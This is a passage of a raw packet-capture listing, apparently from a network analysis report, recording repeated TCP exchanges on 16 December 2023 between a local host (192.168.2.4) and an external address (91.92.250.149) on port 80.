                                                                                        Dec 16, 2023 18:16:57.695152998 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695166111 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695202112 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695214987 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695235968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695247889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695260048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695272923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695295095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695316076 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695317030 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695329905 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695343018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695352077 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695354939 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695363998 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695377111 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695384026 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695395947 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695415020 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695420027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695441008 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695458889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695462942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695476055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695488930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695497990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695516109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695523977 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695533037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695537090 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695549011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695560932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695584059 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695590019 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695614100 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695621014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695626020 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695647001 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695660114 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695666075 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695683956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695693016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695718050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695727110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695739031 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695760965 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695780039 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695787907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695821047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695856094 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695871115 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695889950 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695900917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695915937 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695940018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695951939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695966005 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.695974112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.695991039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696002007 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696027994 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696044922 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696058035 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696070910 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696079016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696098089 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696115971 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696398973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696412086 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696432114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696444988 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696448088 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696460962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696480989 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696501970 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696535110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696568966 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696577072 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696602106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696609020 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696631908 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696635008 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696655989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696664095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696686983 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696691036 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696729898 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696733952 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696765900 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696788073 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696801901 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696821928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696836948 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696894884 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696928024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.696965933 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696979046 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.696991920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697002888 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697015047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697032928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697058916 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697091103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697113991 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697127104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697145939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697175026 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697180986 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697206020 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697223902 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697257042 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697280884 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697312117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697334051 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697350979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697364092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697366953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697384119 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697401047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697402954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697413921 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697436094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697453976 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697459936 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697484970 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697491884 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697516918 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697540998 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697572947 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697632074 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697645903 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697658062 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697668076 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697674990 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697688103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697710991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697736025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697748899 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697760105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697771072 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697772980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697788000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697803020 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697813988 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697817087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697829962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697841883 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697849989 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697869062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697880030 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697895050 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697925091 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697933912 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697954893 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.697961092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697983027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.697994947 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698005915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698015928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698031902 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698041916 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698062897 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698081017 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698092937 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698107004 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698115110 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698122978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698138952 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698151112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698173046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698194027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698208094 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698230028 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698242903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698254108 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698282003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698287010 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698306084 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698316097 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698328972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698338985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698359966 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698411942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698425055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698436975 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698446035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698458910 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698478937 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698479891 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698509932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698513985 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698550940 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698559999 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698596954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698770046 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698782921 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698795080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698805094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698823929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698823929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698837042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698839903 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698858023 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698860884 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698875904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698894978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698904991 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698918104 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698930025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.698940039 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698959112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.698971987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699168921 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699202061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699307919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699342012 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699404001 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699438095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699470997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699503899 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699537039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699568987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699692011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699724913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699740887 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699765921 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699773073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699800014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699809074 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699841022 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699877977 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699889898 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699913979 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699920893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.699933052 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.699950933 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700346947 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700381041 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700403929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700436115 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700449944 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700481892 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700500965 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700532913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700556993 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700571060 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700588942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700593948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700607061 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700607061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700638056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700684071 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700716019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700882912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700915098 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.700932980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.700967073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701001883 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701035023 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701195955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701229095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701251984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701276064 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701283932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701313972 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701386929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701422930 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701428890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701442003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701459885 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701474905 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701623917 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701656103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701723099 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701735973 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701757908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701771021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701894045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701906919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701917887 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701925039 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701931000 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.701942921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701957941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.701983929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702018023 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702145100 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702157974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702169895 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702178955 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702200890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702215910 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702320099 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702353954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702357054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702369928 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702394009 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702409029 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702419043 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702450037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702491999 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702527046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702536106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702569962 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702610970 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702624083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702636003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702644110 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702656031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702676058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702687025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702711105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702719927 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702752113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702812910 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702847004 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702903032 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702924967 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.702938080 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702950001 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.702981949 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703007936 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703015089 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703042030 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703181028 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703213930 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703226089 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703239918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703258991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703263044 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.703277111 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.703289032 CET4972980192.168.2.491.92.250.149
